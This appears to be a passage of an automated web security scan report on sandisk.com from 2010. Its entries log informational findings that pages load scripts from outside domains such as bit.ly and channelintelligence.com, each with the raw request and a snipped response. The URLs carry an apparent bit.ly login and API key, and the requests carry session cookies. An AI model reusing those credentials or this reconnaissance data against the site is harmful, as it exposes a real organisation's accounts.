Host:	http://www.sandisk.com
Path:	/media/100764/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/100764/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.138. http://www.sandisk.com/media/100769/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/100769/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/100769/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.139. http://www.sandisk.com/media/100774/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/100774/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/100774/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

2.140. http://www.sandisk.com/media/27670/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27670/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/27670/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.141. http://www.sandisk.com/media/27675/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27675/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/27675/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.142. http://www.sandisk.com/media/27685/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27685/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/27685/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.143. http://www.sandisk.com/media/27690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27690/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/27690/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.144. http://www.sandisk.com/media/27695/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27695/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/27695/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.145. http://www.sandisk.com/media/407994/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/407994/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/407994/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.146. http://www.sandisk.com/media/745047/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/745047/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/745047/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

2.147. http://www.sandisk.com/misc/404error previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/misc/404error

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /misc/404error HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-09-sandisk-wins-ces-innovations-2011-design-and-engineering-award-for-world...s-smallest-64gb-solid-state-drive
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12579
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.148. http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/camcorder/sandisk-extreme-hd-video-sdhc-cards

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRX3-016G-A21&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRX3-4096-A21&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRX3-8192-A21&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/camcorder/sandisk-extreme-hd-video-sdhc-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31382
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Extreme.. HD Video SDHC... 16GB Card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRX3-016G-A21&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Extreme.. HD Video SDHC... 8GB Card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRX3-8192-A21&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Extreme.. HD Video SDHC... 4GB Card
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRX3-4096-A21&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.149. http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/camcorder/sandisk-video-hd-sdhc

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDHV-004G-A15&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDHV-008G-A15&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDHV-016G-A15&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/camcorder/sandisk-video-hd-sdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30500
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Capture the whole story in top quality video on the highest capacity 16GB SanDisk.. Video HD... card, the ultimate memory card optimized for video.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDHV-016G-A15&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Keep shooting all of your important moments with the 8GB SanDisk.. Video HD... memory card, the ultimate memory card optimized for video.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDHV-008G-A15&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Capture those important moments with the ultimate memory card optimized for video, the 4GB SanDisk.. Video HD... card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDHV-004G-A15&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.150. http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/computing-products/sandisk-cruzer-blade-usb-flash-drive

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-002G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-004G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-008G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-016G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/computing-products/sandisk-cruzer-blade-usb-flash-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30801
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>


<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk.. Cruzer.. Blade... USB flash drive 16GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk.. Cruzer.. Blade... USB flash drive 8GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk.. Cruzer.. Blade... USB flash drive 4GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk.. Cruzer.. Blade... USB flash drive 2GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ50-002G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.151. http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/computing-products/sandisk-solid-state-drive

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDS7CB-060G-G25&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDS7CB-120G-G25&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/computing-products/sandisk-solid-state-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 52812
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>


<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Twice the capacity with the same reliability, durability and performance for your laptop or PC.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDS7CB-120G-G25&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Upgrade your laptop to better performance: With SanDisk.. SSD, you...ll enjoy faster boot-ups and open files in up to half the time compared to a 7200 hard drivei.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDS7CB-060G-G25&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.152. http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/computing-products/sandisk-ultra-backup-usb-flash-drive

Issue detail

The response dynamically includes the following scripts from other domains:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-008G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-016G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-032G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZ40-064G-A11&nRGID=2519
http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp
http://static.ak.fbcdn.net/connect.php/js/FB.Share

Request

GET /products/computing-products/sandisk-ultra-backup-usb-flash-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53783
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:49 GMT
Connection: close

